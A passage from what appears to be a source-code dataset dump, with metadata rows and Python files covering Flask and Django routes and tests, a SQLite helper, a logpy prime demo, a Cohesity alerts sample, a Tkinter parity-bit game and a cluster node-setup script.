| 22.692308 | 81 | 0.664407 | 139 | 885 | 3.848921 | 0.402878 | 0.078505 | 0.11215 | 0.052336 | 0.246729 | 0.115888 | 0 | 0 | 0 | 0 | 0 | 0.007331 | 0.229379 | 885 | 38 | 82 | 23.289474 | 0.777126 | 0.105085 | 0 | 0 | 0 | 0 | 0.010139 | 0 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.055556 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94d3fece27f326587064410869c31cb46bef8d4c | 3,497 | py | Python | tests/test_errors.py | zzacharo/flask-resources | a99e27ea299b9a47237c3c19b87c8600fcc9bcab | [
"MIT"
] | null | null | null | tests/test_errors.py | zzacharo/flask-resources | a99e27ea299b9a47237c3c19b87c8600fcc9bcab | [
"MIT"
] | null | null | null | tests/test_errors.py | zzacharo/flask-resources | a99e27ea299b9a47237c3c19b87c8600fcc9bcab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Flask--Resources is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Errors test module."""
import pytest
from flask import Flask
from flask_resources.resources import CollectionResource, Resource, ResourceConfig
# These classes are in the file because they are under test too
class CustomConfig(ResourceConfig):
"""Custom resource configuration."""
item_route = "/custom/<id>"
list_route = "/custom/"
class CustomResource(CollectionResource):
"""Custom resource implementation."""
def __init__(self, *args, **kwargs):
"""Constructor."""
super(CustomResource, self).__init__(config=CustomConfig, *args, **kwargs)
@pytest.fixture(scope="module")
def app():
"""Application factory fixture."""
app_ = Flask(__name__)
custom_bp = CustomResource().as_blueprint("custom_resource")
app_.register_blueprint(custom_bp)
return app_
def test_404_if_no_route(client):
response = client.get("/foo")
assert response.status_code == 404
response = client.post("/foo")
assert response.status_code == 404
response = client.put("/foo")
assert response.status_code == 404
response = client.patch("/foo")
assert response.status_code == 404
response = client.delete("/foo")
assert response.status_code == 404
def test_405_if_route_but_no_method(client):
# TODO: Only implement MethodView methods for defined Resource methods. Only then
# can we test that all methods return 405 (and not just the ones this library
# didn't define in its MethodViews
# NOTE: For now we just test the methods that this library
# didn't define in its MethodViews
# List-level
response = client.put("/custom/")
assert response.status_code == 405
response = client.delete("/custom/")
assert response.status_code == 405
# Item-level
response = client.post("/custom/1")
assert response.status_code == 405
def test_406_if_route_method_but_unsupported_accept(client):
# NOTE: By default we don't accept any mimetype at all
headers = {"accept": "application/marcxml+garbage"}
# List-level
response = client.get("/custom/", headers=headers)
assert response.status_code == 406
response = client.post("/custom/", headers=headers)
assert response.status_code == 406
# Item-level
response = client.get("/custom/1", headers=headers)
assert response.status_code == 406
response = client.put("/custom/1", headers=headers)
assert response.status_code == 406
response = client.patch("/custom/1", headers=headers)
assert response.status_code == 406
response = client.delete("/custom/1", headers=headers)
assert response.status_code == 406
def test_415_if_route_method_accept_but_unsupported_content_type(client):
# NOTE: Right now, we rely entirely on headers for payload assessment.
headers = {"accept": "application/json", "content-type": "application/json+garbage"}
# NOTE: We only test methods that accept a payload
# List-level
response = client.post("/custom/", headers=headers)
assert response.status_code == 415
# Item-level
response = client.put("/custom/1", headers=headers)
assert response.status_code == 415
response = client.patch("/custom/1", headers=headers)
assert response.status_code == 415
| 30.146552 | 88 | 0.698885 | 443 | 3,497 | 5.367946 | 0.31377 | 0.100084 | 0.142977 | 0.171573 | 0.433558 | 0.378049 | 0.337679 | 0.336417 | 0.226661 | 0.186712 | 0 | 0.027465 | 0.187875 | 3,497 | 115 | 89 | 30.408696 | 0.809859 | 0.261653 | 0 | 0.418182 | 0 | 0 | 0.100552 | 0.02011 | 0 | 0 | 0 | 0.008696 | 0.309091 | 1 | 0.109091 | false | 0 | 0.054545 | 0 | 0.254545 | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94de4848bf82da339fb5d648899d321cd7d71842 | 2,415 | py | Python | sql.py | saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands | 408ca3bbce4cd9f5c0414d190d7563872d2294ca | [
"MIT"
] | null | null | null | sql.py | saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands | 408ca3bbce4cd9f5c0414d190d7563872d2294ca | [
"MIT"
] | 2 | 2021-02-08T20:52:31.000Z | 2021-04-30T20:49:22.000Z | sql.py | saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands | 408ca3bbce4cd9f5c0414d190d7563872d2294ca | [
"MIT"
] | null | null | null | ##−∗−coding : utf−8−∗−
import sqlite3 as lite
import logging
import sys
from collections import OrderedDict
import conf
LOG_FORMAT = "%(levelname)s > Line:%(lineno)s - %(message)s"
logging.basicConfig(filename="debug.log",
level=logging.DEBUG,
format=LOG_FORMAT,
filemode="w",
)
logger = logging.getLogger(__name__)
# encode: string -> byte
# unicode.encode() -> bytes
# decode: bytes -> string
# bytes.decode() -> unicode
# no need to encoding or decode
def decode_to_text(text):
if isinstance(text, str):
print(text)
if "সময়" == text:
logger.debug(str(text.encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
# decode_text = text.encode('utf-8').decode('utf-8')
decode_text = text
else:
decode_text = text
return decode_text
def convert_into_dic(columns, rows):
"""
Return query value into dictionary
:type columns: list
:type rows: tuple
"""
column_name = None
row_val = None
query_val = OrderedDict()
length_c = len(columns)
for c in range(0,length_c):
column_name = columns[c]
query_val[column_name] = [] # create key name with empty list value
for r in range(0,len(rows)):
row_val = decode_to_text(rows[r][c])
query_val[column_name].append(row_val)
return query_val
def run_query(query):
"""
Return query result
sql: rawstring of sql
"""
con = None
data = None
try:
con = lite.connect('VoiceCommand.db')
cur = con.cursor()
cur.execute(query)
# TODO: Simplified it
if True in map(lambda x: x.lower() in query.lower(),['update','insert','delete']):
conf.NEW_COMMAND = True
data = cur.fetchall()
print(data)
if cur.description:
column_name = [c[0] for c in cur.description]
if data:
data = convert_into_dic(column_name, data)
con.commit()
except lite.Error as e:
print("Error {}:".format(e.args[0]))
sys.exit(1)
finally:
if con:
con.close()
return data
| 24.642857 | 94 | 0.541201 | 295 | 2,415 | 4.345763 | 0.4 | 0.046802 | 0.031201 | 0.021841 | 0.106084 | 0.051482 | 0.051482 | 0.051482 | 0.051482 | 0.051482 | 0 | 0.007538 | 0.340787 | 2,415 | 97 | 95 | 24.896907 | 0.791457 | 0.15528 | 0 | 0.068966 | 0 | 0 | 0.061772 | 0 | 0 | 0 | 0 | 0.010309 | 0 | 1 | 0.051724 | false | 0 | 0.086207 | 0 | 0.189655 | 0.051724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94e815de52b0c80818511ee7e582fc5b96f3f18e | 686 | py | Python | Chapter 06/code/prime.py | shivampotdar/Artificial-Intelligence-with-Python | 00221c3b1a6d8003765d1ca48b5c95f86da375d9 | [
"MIT"
] | 387 | 2017-02-11T18:28:50.000Z | 2022-03-27T01:16:05.000Z | Chapter 06/code/prime.py | shivampotdar/Artificial-Intelligence-with-Python | 00221c3b1a6d8003765d1ca48b5c95f86da375d9 | [
"MIT"
] | 18 | 2017-12-15T03:10:25.000Z | 2021-04-20T14:32:43.000Z | Chapter 06/code/prime.py | shivampotdar/Artificial-Intelligence-with-Python | 00221c3b1a6d8003765d1ca48b5c95f86da375d9 | [
"MIT"
] | 407 | 2017-01-23T15:18:33.000Z | 2022-03-16T05:39:02.000Z | import itertools as it
import logpy.core as lc
from sympy.ntheory.generate import prime, isprime
# Check if the elements of x are prime
def check_prime(x):
if lc.isvar(x):
return lc.condeseq([(lc.eq, x, p)] for p in map(prime, it.count(1)))
else:
return lc.success if isprime(x) else lc.fail
# Declate the variable
x = lc.var()
# Check if an element in the list is a prime number
list_nums = (23, 4, 27, 17, 13, 10, 21, 29, 3, 32, 11, 19)
print('\nList of primes in the list:')
print(set(lc.run(0, x, (lc.membero, x, list_nums), (check_prime, x))))
# Print first 7 prime numbers
print('\nList of first 7 prime numbers:')
print(lc.run(7, x, check_prime(x)))
| 29.826087 | 76 | 0.672012 | 129 | 686 | 3.534884 | 0.511628 | 0.065789 | 0.072368 | 0.078947 | 0.100877 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048736 | 0.19242 | 686 | 22 | 77 | 31.181818 | 0.774368 | 0.198251 | 0 | 0 | 1 | 0 | 0.111927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.428571 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
94e8f60f50c58e23f136b937277c55b1b0aa4b3d | 510 | py | Python | vigobusapi/exceptions.py | Lodeiro0001/Python_VigoBusAPI | 29b5231a2e76513bf92cc1455d021b0080ea6156 | [
"Apache-2.0"
] | 4 | 2019-07-18T22:25:31.000Z | 2021-03-09T19:01:14.000Z | vigobusapi/exceptions.py | Lodeiro0001/Python_VigoBusAPI | 29b5231a2e76513bf92cc1455d021b0080ea6156 | [
"Apache-2.0"
] | 3 | 2021-09-12T20:15:38.000Z | 2021-09-18T16:35:27.000Z | vigobusapi/exceptions.py | David-Lor/VigoBusAPI | 40db5a644f43a8f98cb40a9e5519a028fe18db14 | [
"Apache-2.0"
] | 3 | 2020-10-03T21:45:39.000Z | 2021-05-06T21:27:03.000Z | """EXCEPTIONS
Exceptions used on the project
"""
__all__ = ("VigoBusAPIException", "StopNotExist", "StopNotFound")
class VigoBusAPIException(Exception):
"""Base exception for the project custom exceptions"""
pass
class StopNotExist(VigoBusAPIException):
"""The Stop does not physically exist (as reported by an external trusted API/data source)"""
pass
class StopNotFound(VigoBusAPIException):
"""The Stop was not found on a local data source, but might physically exist"""
pass
| 24.285714 | 97 | 0.735294 | 58 | 510 | 6.396552 | 0.603448 | 0.053908 | 0.140162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170588 | 510 | 20 | 98 | 25.5 | 0.877069 | 0.494118 | 0 | 0.428571 | 0 | 0 | 0.182203 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.428571 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
94ec70758c4eb3a460d3205093a384c85fc59aea | 2,269 | py | Python | samples/list_unresolved_alerts/list_unresolved_alerts.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | 18 | 2019-09-24T17:35:53.000Z | 2022-03-25T08:08:47.000Z | samples/list_unresolved_alerts/list_unresolved_alerts.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | 18 | 2019-03-29T19:32:29.000Z | 2022-01-03T23:16:45.000Z | samples/list_unresolved_alerts/list_unresolved_alerts.py | chandrashekar-cohesity/management-sdk-python | 9e6ec99e8a288005804b808c4e9b19fd204e3a8b | [
"Apache-2.0"
] | 16 | 2019-02-27T06:54:12.000Z | 2021-11-16T18:10:24.000Z | # Copyright 2019 Cohesity Inc.
#
# Python example to list recent user_configurable unresolved alert unresolved Alerts.
#
# Usage: python list_unresolved_alerts.py --max_alerts 10
import argparse
import datetime
from cohesity_management_sdk.cohesity_client import CohesityClient
from cohesity_management_sdk.models.alert_state_list_enum import AlertStateListEnum
CLUSTER_USERNAME = 'cluster_username'
CLUSTER_PASSWORD = 'cluster_password'
CLUSTER_VIP = 'prod-cluster.cohesity.com'
DOMAIN = 'LOCAL'
MAX_ALERTS = 100
class Alerts(object):
"""
Class to display Alerts.
"""
def display_alerts(self, cohesity_client, max_alerts):
"""
Method to display the list of Unresolved Alerts
:param cohesity_client(object): Cohesity client object.
:return:
"""
alerts = cohesity_client.alerts
alerts_list = alerts.get_alerts(max_alerts=max_alerts,
alert_state_list=AlertStateListEnum.KOPEN)
for alert in alerts_list:
print ('{0:<10}\t\t{1:>8}\t{2:>10}'.format(self.epoch_to_date(alert.first_timestamp_usecs),
alert.alert_category,
alert.severity))
@staticmethod
def epoch_to_date(epoch):
"""
Method to convert epoch time in usec to date format
:param epoch(int): Epoch time of the job run.
:return: date(str): Date format of the job run.
"""
date_string = datetime.datetime.fromtimestamp(epoch/10**6).strftime('%m-%d-%Y %H:%M:%S')
return date_string
def main(args):
# To init client with user/pass.
cohesity_client = CohesityClient(cluster_vip=CLUSTER_VIP,
username=CLUSTER_USERNAME,
password=CLUSTER_PASSWORD,
domain=DOMAIN)
alerts = Alerts()
alerts.display_alerts(cohesity_client, args.max_alerts)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Arguments needed to run this python process.")
parser.add_argument("--max_alerts", help="Number of Alerts.", default=MAX_ALERTS)
args = parser.parse_args()
main(args)
| 36.596774 | 103 | 0.639929 | 262 | 2,269 | 5.316794 | 0.396947 | 0.051687 | 0.031587 | 0.035894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012107 | 0.271926 | 2,269 | 61 | 104 | 37.196721 | 0.831114 | 0.21331 | 0 | 0 | 0 | 0 | 0.11032 | 0.030249 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088235 | false | 0.058824 | 0.117647 | 0 | 0.264706 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
94eec894af0b3d5c84e7d7a3601f782b23665aad | 367 | py | Python | random_geometry_points_service/app.py | brauls/random-geometry-points-service | f935bce1e584eb9a53a0c7b90f43fe305716cd83 | [
"MIT"
] | null | null | null | random_geometry_points_service/app.py | brauls/random-geometry-points-service | f935bce1e584eb9a53a0c7b90f43fe305716cd83 | [
"MIT"
] | 1 | 2021-06-01T22:13:25.000Z | 2021-06-01T22:13:25.000Z | random_geometry_points_service/app.py | brauls/random-geometry-points-service | f935bce1e584eb9a53a0c7b90f43fe305716cd83 | [
"MIT"
] | null | null | null | """Entry module that inits the flask app.
"""
from flask import Flask
from .endpoints.api import init_api
def create_app():
"""Create the flask app and initialize the random geometry points api.
Returns:
Flask: The initialized flask app
"""
flask_app = Flask(__name__)
api = init_api()
api.init_app(flask_app)
return flask_app
| 20.388889 | 74 | 0.686649 | 52 | 367 | 4.634615 | 0.442308 | 0.19917 | 0.091286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.231608 | 367 | 17 | 75 | 21.588235 | 0.85461 | 0.416894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
94f64dcb7aa539a6fdad0452d376747f0e492320 | 2,125 | py | Python | apps/users/urls.py | CosmosTUe/Cosmos | cec2541d3f8ea1944edfaab2090916ba66f9d2f3 | [
"MIT"
] | 1 | 2021-02-01T19:27:07.000Z | 2021-02-01T19:27:07.000Z | apps/users/urls.py | CosmosTUe/Cosmos | cec2541d3f8ea1944edfaab2090916ba66f9d2f3 | [
"MIT"
] | 79 | 2020-08-05T09:01:00.000Z | 2022-03-24T11:27:21.000Z | apps/users/urls.py | CosmosTUe/Cosmos | cec2541d3f8ea1944edfaab2090916ba66f9d2f3 | [
"MIT"
] | 3 | 2021-02-22T18:36:52.000Z | 2021-10-13T17:05:44.000Z | from django.contrib.auth import views as auth_views
from django.urls import path
from django.urls.base import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from . import views, webhooks
from .forms.authorization import CosmosPasswordChangeForm, CosmosPasswordResetForm, CosmosSetPasswordForm
app_name = "cosmos_users"
urlpatterns = [
# auth urls
path("login/", views.CosmosLoginView.as_view(), name="login"),
path("logout/", auth_views.LogoutView.as_view(), name="logout"),
path(
"password_change/",
auth_views.PasswordChangeView.as_view(
form_class=CosmosPasswordChangeForm, success_url=reverse_lazy("cosmos_users:password_change_done")
),
name="password_change",
),
path("password_change/done/", auth_views.PasswordChangeDoneView.as_view(), name="password_change_done"),
path(
"password_reset/",
auth_views.PasswordResetView.as_view(
form_class=CosmosPasswordResetForm, success_url=reverse_lazy("cosmos_users:password_reset_done")
),
name="password_reset",
),
path("password_reset/done/", auth_views.PasswordResetDoneView.as_view(), name="password_reset_done"),
path(
"reset/<uidb64>/<token>/",
auth_views.PasswordResetConfirmView.as_view(
form_class=CosmosSetPasswordForm, success_url=reverse_lazy("cosmos_users:password_reset_complete")
),
name="password_reset_confirm",
),
path("reset/done/", auth_views.PasswordResetCompleteView.as_view(), name="password_reset_complete"),
# custom urls
path("profile/", views.profile, name="user_profile"),
path("delete/", views.delete, name="user_delete"),
path(
"register/",
views.RegistrationWizard.as_view(views.FORMS, condition_dict=views.CONDITION_DICT),
name="user_register",
),
path("register/done/", views.registration_done, name="registration_done"),
path("confirm/<uidb64>/<token>/", views.activate, name="confirm_registration"),
path("hook/", csrf_exempt(webhooks.SendGridWebhook.as_view()), name="email_hook"),
]
| 41.666667 | 110 | 0.712471 | 234 | 2,125 | 6.196581 | 0.264957 | 0.041379 | 0.041379 | 0.031034 | 0.121379 | 0.089655 | 0.089655 | 0.062069 | 0 | 0 | 0 | 0.002242 | 0.160471 | 2,125 | 50 | 111 | 42.5 | 0.810538 | 0.009882 | 0 | 0.244444 | 0 | 0 | 0.241314 | 0.102332 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.333333 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
94fb0fe077d6b59a58c02576467e7b6263b1935f | 641 | py | Python | tests/cases.py | bio2bel/antibodyregistry | a3ad09544d652b85c55ad0ca8341b85b14b3c6c7 | [
"MIT"
] | null | null | null | tests/cases.py | bio2bel/antibodyregistry | a3ad09544d652b85c55ad0ca8341b85b14b3c6c7 | [
"MIT"
] | null | null | null | tests/cases.py | bio2bel/antibodyregistry | a3ad09544d652b85c55ad0ca8341b85b14b3c6c7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Test cases for Bio2BEL Antibody Registry."""
from bio2bel.testing import AbstractTemporaryCacheClassMixin
from bio2bel_antibodyregistry import Manager
from tests.constants import TEST_RESULTS_PATH
__all__ = [
'TemporaryCacheClass',
]
class TemporaryCacheClass(AbstractTemporaryCacheClassMixin):
"""A test case containing a temporary database and a Bio2BEL Antibody Registry manager."""
Manager = Manager
manager: Manager
@classmethod
def populate(cls):
"""Populate the Bio2BEL Antibody Registry database with test data."""
cls.manager.populate(url=TEST_RESULTS_PATH)
| 26.708333 | 94 | 0.75039 | 68 | 641 | 6.941176 | 0.529412 | 0.118644 | 0.146186 | 0.118644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011257 | 0.168487 | 641 | 23 | 95 | 27.869565 | 0.874296 | 0.332293 | 0 | 0 | 0 | 0 | 0.046117 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a203a7f292c0dce3d1fe23b14cbe29f8eaebc9ab | 7,134 | py | Python | selfchecking1.py | JJP-SWFC/Self-Checking-Binary-Code | 701aa91c39c8673c52991af828ce907beb77c9ac | [
"MIT"
] | null | null | null | selfchecking1.py | JJP-SWFC/Self-Checking-Binary-Code | 701aa91c39c8673c52991af828ce907beb77c9ac | [
"MIT"
] | null | null | null | selfchecking1.py | JJP-SWFC/Self-Checking-Binary-Code | 701aa91c39c8673c52991af828ce907beb77c9ac | [
"MIT"
] | null | null | null | from tkinter import *
import numpy as np
import random
#generates a random 16 digits
digtexts = np.random.randint(2, size=16)
q1check = 0
q2check = 0
q3check = 0
q4check = 0
q5check = 0
#The function to swap 1s to 0s, it is used as the button command
def flipper0():
#Probably an awful way of swapping a 1 to a 0 but oh well
dig0["text"] = (str(int((not bool(int(dig0["text"]))))))
def flipper1():
dig1["text"] = (str(int((not bool(int(dig1["text"]))))))
def flipper2():
dig2["text"] = (str(int((not bool(int(dig2["text"]))))))
def flipper4():
dig4["text"] = (str(int((not bool(int(dig4["text"]))))))
def flipper8():
dig8["text"] = (str(int((not bool(int(dig8["text"]))))))
def checkAnswer():
global q1check, q2check, q3check, q4check, q5check
#sets the checks to a new variable so I can put them back afterwards
oldq1 = q1check
oldq2 = q2check
oldq3 = q3check
oldq4 = q4check
oldq5 = q5check
#Sets each label or button to the default background
dig0["background"] = "SystemButtonFace"
dig1["background"] = "SystemButtonFace"
dig2["background"] = "SystemButtonFace"
dig3["background"] = "SystemButtonFace"
dig4["background"] = "SystemButtonFace"
dig5["background"] = "SystemButtonFace"
dig6["background"] = "SystemButtonFace"
dig7["background"] = "SystemButtonFace"
dig8["background"] = "SystemButtonFace"
dig9["background"] = "SystemButtonFace"
dig10["background"] = "SystemButtonFace"
dig11["background"] = "SystemButtonFace"
dig12["background"] = "SystemButtonFace"
dig13["background"] = "SystemButtonFace"
dig14["background"] = "SystemButtonFace"
dig15["background"] = "SystemButtonFace"
#Gets the text of each of the buttons
selzero = dig0["text"]
selone = dig1["text"]
seltwo = dig2["text"]
selfour = dig4["text"]
seleight = dig8["text"]
#adds the 1s to the total if the selection is a 1
q1check += int(selone)
q2check += int(seltwo)
q3check += int(selfour)
q4check += int(seleight)
q5check += int(selzero) + int(selone) + int(seltwo) + int(selfour) + int(seleight)
if q1check%2 != 0:
print("Check the first selection box")
#Highlights the boxes for this selection
dig1["background"] = "light blue"
dig5["background"] = "light blue"
dig9["background"] = "light blue"
dig13["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q2check%2 != 0:
print("Check the second selection box")
dig2["background"] = "light blue"
dig6["background"] = "light blue"
dig10["background"] = "light blue"
dig14["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q3check%2 != 0:
print("Check the third selection box")
dig4["background"] = "light blue"
dig5["background"] = "light blue"
dig6["background"] = "light blue"
dig7["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q4check%2 != 0:
print("Check the final selection box")
dig8["background"] = "light blue"
dig9["background"] = "light blue"
dig10["background"] = "light blue"
dig11["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q5check %2 != 0:
print("You have an odd number of 1s")
else:
print("Well done! You got it right!")
#Puts the checks back to their previous state
q1check = oldq1
q2check = oldq2
q3check = oldq3
q4check = oldq4
q5check = oldq5
if __name__ == "__main__":
#The name of the main thing
gui = Tk()
#Adds the "check answer" button
checkmyanswer = Button(gui, text="Check Answer", command=checkAnswer)
#Add all the buttons and put them in their place "pady" adds vertical space
dig0 = Button(gui, text=digtexts[0], command=flipper0)
dig1 = Button(gui, text=digtexts[1], command=flipper1)
dig2 = Button(gui, text=digtexts[2], command=flipper2)
dig4 = Button(gui, text=digtexts[4], command=flipper4)
dig8 = Button(gui, text=digtexts[8], command=flipper8)
dig0.grid(row=0,column=0,pady=5)
dig1.grid(row=0,column=1)
dig2.grid(row=0,column=2)
dig4.grid(row=1,column=0)
dig8.grid(row=2,column=0,pady=5)
#Make all the rest random, also probably horribly inefficient but it's not a big code so it's fine for now
dig3 = Label(gui, text=digtexts[3])
dig5 = Label(gui, text=digtexts[5])
dig6 = Label(gui, text=digtexts[6])
dig7 = Label(gui, text=digtexts[7])
dig9 = Label(gui, text=digtexts[9])
dig10 = Label(gui, text=digtexts[10])
dig11 = Label(gui, text=digtexts[11])
dig12 = Label(gui, text=digtexts[12])
dig13 = Label(gui, text=digtexts[13])
dig14 = Label(gui, text=digtexts[14])
dig15 = Label(gui, text=digtexts[15])
#Sets all of the positions of each label
dig3.grid(row=0,column=3)
dig5.grid(row=1,column=1)
dig6.grid(row=1,column=2)
dig7.grid(row=1,column=3)
dig9.grid(row=2,column=1)
dig10.grid(row=2,column=2)
dig11.grid(row=2,column=3)
dig12.grid(row=3,column=0)
dig13.grid(row=3,column=1)
dig14.grid(row=3,column=2)
dig15.grid(row=3,column=3)
#Makes sure that "checkanswer" spans across all 4 columns and also has a bit of space from the text
checkmyanswer.grid(row=4, columnspan=4, pady=5)
#Numbers 0 through to 15
for i in range(16):
#Checks that i is not a power of 2
if (not (i & (i-1) == 0)):
#Checks if the last digit is a 1
if (str(format(i,"04b"))[3]) == "1":
if digtexts[i] == 1:
q1check += 1
#Checks if the second to last digit is a 1
if (str(format(i,"04b"))[2]) == "1":
if digtexts[i] == 1:
q2check += 1
#Checks if the third to last digit is a 1
if (str(format(i,"04b"))[1]) == "1":
if digtexts[i] == 1:
q3check += 1
#Checks if the fourth to last digit is a 1
if (str(format(i,"04b"))[0]) == "1":
if digtexts[i] == 1:
q4check += 1
#Just checks all of the 1s that aren't the "selector" ones
if digtexts[i] == 1:
q5check += 1
#Runs the system
gui.mainloop()
| 36.963731 | 111 | 0.585366 | 912 | 7,134 | 4.570175 | 0.217105 | 0.115163 | 0.145873 | 0.052783 | 0.259837 | 0.232965 | 0.208973 | 0.141555 | 0.141555 | 0.141555 | 0 | 0.060213 | 0.276002 | 7,134 | 192 | 112 | 37.15625 | 0.746757 | 0.152089 | 0 | 0.214286 | 1 | 0 | 0.227195 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038961 | false | 0 | 0.019481 | 0 | 0.058442 | 0.038961 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a2249efce47df056312d91cc653b9f530c413e5a | 1,304 | py | Python | src/clic/initnode.py | NathanRVance/clic | e28f7f2686f5ac6689b384474e3fdfa4d207f6ec | [
"MIT"
] | 2 | 2017-12-13T03:41:07.000Z | 2019-03-12T14:08:42.000Z | src/clic/initnode.py | NathanRVance/clic | e28f7f2686f5ac6689b384474e3fdfa4d207f6ec | [
"MIT"
] | null | null | null | src/clic/initnode.py | NathanRVance/clic | e28f7f2686f5ac6689b384474e3fdfa4d207f6ec | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import os
from pathlib import Path
from pwd import getpwnam
from clic import pssh
import configparser
config = configparser.ConfigParser()
config.read('/etc/clic/clic.conf')
user = config['Daemon']['user']
def init(host, cpus, disk, mem, user=user):
# Copy executables in /etc/clic/ to node and run in shell expansion order
paths = [path for path in Path('/etc/clic').iterdir()]
paths.sort()
for path in paths:
if path.is_file() and os.access(str(path), os.X_OK):
dest = '/tmp/{0}'.format(path.parts[-1])
pssh.copy(user, user, host, str(path), dest)
pssh.run(user, user, host, 'sudo {0} {1} {2} {3}'.format(dest, cpus, disk, mem))
def main():
import argparse
import re
parser = argparse.ArgumentParser(description='Intitialize a node for use with clic by configuring its /etc/hosts and nfs. This script is run from the head node.')
from clic import version
parser.add_argument('-v', '--version', action='version', version=version.__version__)
parser.add_argument('userhost', metavar='USER@HOST', nargs=1, help='passwordless ssh exists both ways between USER@localhost and USER@HOST')
args = parser.parse_args()
